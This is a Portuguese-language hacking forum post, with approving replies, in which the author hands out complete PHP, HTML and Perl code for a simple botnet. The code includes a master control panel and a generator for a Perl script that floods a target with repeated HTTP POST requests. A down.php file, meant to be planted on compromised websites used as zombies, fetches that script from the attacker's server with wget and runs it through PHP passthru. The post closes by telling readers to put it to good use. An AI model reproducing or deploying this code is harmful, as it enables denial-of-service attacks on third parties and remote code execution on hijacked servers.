Pessoal, todos aqui devem ter visto meu tópico falando sobre Botnets, que tinha um script feito em PHP.
Pois bem, dei uma incrementada legal no script, alterei bastante coisa, inclusive o Design, e agora dou uma explicação mais detalhada de como funciona.
Para quem não viu o primeiro post, leia-o aqui: http://www.darkers.com.br/smf/index.php ... 002.0.html (http://www.darkers.com.br/smf/index.php/topic,3002.0.html)
Bem, vou ensinar aqui como você pode fazer uma Botnet de um modo simples e fácil. Vou disponibilizar aqui um script bem simples, feito em PHP, melhorado por mim.
Pra começar, você precisa tem no seu servidor pessoal suporte a rodar PHP, e algumas Shells por aí, com suporte a
wget,
perl,
php, e a função
passthru("") do PHP deve estar abilitada.
No seu servidor pessoal deve ter os seguintes arquivos:
index.html:
<html><head><title>Botnet Master - Configurations:</title></head>
<FRAMESET rows="14%,76%,*" frameborder="no" border="0">
<frame src="top.html">
<frame src="center.html">
<frame src="bottom.html">
</frameset>
</html>
top.html:
<html><body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="6">HadeS :</font> <font color="red" size="6">The Lord of Underground</font><br>
<u>Personal Botnet:</u></center>
</body></html>
bottom.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center>© <a href=http://www.darkers.com.br>Security Darkers</a>
</center>
</body>
</html>
left.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="4"><u>Exploit Padrão:</font></u></center><br><br>
<form action="create_padrao.php" method="POST">
<b>Servidor:</b><br><input type="text" name="server"><br><br>
<b>Caminho para o arquivo: </b><br><input type="text" name="path"><br><br>
<b>POST string (Use Live HTTP): </b><br><input type="text" name="post"><br><br>
<b>Cookie (Opcional): </b><br><textarea name="cookie" cols="23" rows="3"></textarea><br><br>
<input type="submit" value="Enviar"> <input type="reset" value="Limpar">
</form>
</body>
</html>
right.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="4"><u>Exploit Personalizado:</font></u></center><br><br>
<form action="create_perso.php" method="POST">
<b>Código Fonte do Exploit:</b><br>
<textarea name="xpl" rows="16" cols="65">Cole aqui o Código Fonte do Exploit desejado.
Lembre-se sempre de inserir um valor para as variáveis.</textarea>
<br><br>
<input type="submit" value="Enviar"> <input type="reset" value="Limpar">
</form>
</body>
</html>
create_padrao.php:
<?php
$myFile = "file.txt";
unlink($myFile);
$file = "file.txt";
$fh = fopen($file, 'w') or die("can't open file");
$server = $_POST['server'];
$path = $_POST['path'];
$post = $_POST['post'];
$cookie = $_POST['cookie'];
$data = '#!/usr/bin/perl
use IO::Socket;
$time= "9999";
$HOST = "'. $server .'"; #Host Without http://
$DIR = "' . $path . '"; #Path to file
while($i<$time){
$i++;
$FILE = "' . $post . '";
$LENGTH = length $FILE;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "+";
print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".$HOST."\n";
print $get1 "Cookie: '. $cookie . ' ";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";
print $get1 $FILE;
syswrite STDOUT, "+";
}';
fwrite($fh, $data);
print "Ok, thanks for the data, check your target when you get a load error. If it's still up, try again :).<br><br><b><font color=red>DO NOT CLOSE THIS WINDOW UNTIL THERE'S AN ERROR!!!</b></font>";
?>
<script language="JavaScript">
window.location="run.php";
</script>
create_perso.php:
<?php
$myFile = "file.txt";
unlink($myFile);
$file = "file.txt";
$fh = fopen($file, 'w') or die("Error: Não foi possível abrir o arquivo file.txt .");
$data = $_POST['xpl'];;
fwrite($fh, $data);
?>
<script language="JavaScript">
window.location="run.php";
</script>
run.php:
<?php
$fopen1 = fopen("http://www.SITE.com/down.php", "r");
$fopen2 = fopen("http://www.SITE.com/down.php", "r");
$fopen3 = fopen("http://www.SITE.com/down.php", "r");
fclose($fopen1);
fclose($fopen2);
fclose($fopen3);
?>
<script language="JavaScript">
window.alert("Pronto, o exploit terminou de rodar. Provavelmente o server está OFF, chequê-o.");
window.location = "index.html";
</script>
file.txt:
"Esse arquivo deve estar em branco, e com CHMOD 777."
E nos sites invadidos (As Shells), devem ter o seguinte arquivo:
down.php:
<?php
passthru("wget http://www.SEU_SITE_PESSOAL.com.br/file.txt");
passthru("mv file.txt secret.pl");
passthru("perl secret.pl");
?>
Agora temos que observar alguns pontos.
Primeiro, caso você escolha a opção "Exploit Padrão", na
index.html, você vai inserir algumas informações sobre a vítima, e a página
create_padrao.php irá criar um exploit pré-definido. Caso você escolha a opção "Exploit Personalizado", você deverá inserir o código fonte do exploit no campo que existe na página, e esse exploit que será usado. Mas lembre-se, se você escolher a opção "Exploit Personalizado", não se esqueça de atribuir valores válidos às variaveis, pois caso contrário o exploit não irá rodar corretamente.
Segundo, em alguns arquivos você poderá fazer alterações para personalizá-lo de diversas formas, mas alguns você deverá alterá-los de acordo com sua situação. O primeiro é o
run.php, você deve alterar a URL "http://www.SITE.com/down.php" pela URL do zumbi que possue o arquivo
down.php instalado. O segundo é o
down.php, você deve alterar a URL "http://www.SEU_SITE_PESSOAL.com.br/file.txt" para a URL do seu servidor pessoal (O Master da Botnet), que possue o arquivo
file.txt.
Esse script, como qualquer outro, possue pontos positivos e negativos. Os positivos são que ele é muito simples e compacto, qualquer um pode usá-lo, você pode usar sua botnet de qualquer lugar (Só acessar a URL do master), e você não precisa rootar os zumbis para poder instalar algo, é só enviar a página
down.php. E os negativos são que pelo Master você não tem acesso total ao sistema dos zumbis, você só pode mandar eles rodarem o exploit, e só tem suporte a exploits em Perl.
Em breve liberarei uma "versão" que permite rodar exploits feitos em PHP, Python, Shell Script, e compilados (C, C++, etc). E quem sabe poderei adicionar uma opção de rodar comandos em massa nos zumbis. Se alguém tiver vontade de fazer isso por sí só, sinta-se a vontade.

Façam bom uso.
HadeS
Muito bom Hades ...
bem explicao e tudo mais !
Boa idéia Slul, mas tem um porém.
O uso vai ser abusivo. Todos vão querer usar sem o menor propósito, e isso pode estragar um trabalho alheio. Sem contar que vamos ter que atualizar constantemente, pois uma Shell que não funcione irá impedir o acesso a todas.
Mas podemos pensar nisso. Podemos fazer um restrito.
HadeS
HadeS mais uma vez de parabéns...
Ponto! Por compartilhar este excelente conteúdo...

vlw
locator.dll
Eu ainda acho melhor fazer privado. Isso ia dar muita confusão.
KISS.
HadeS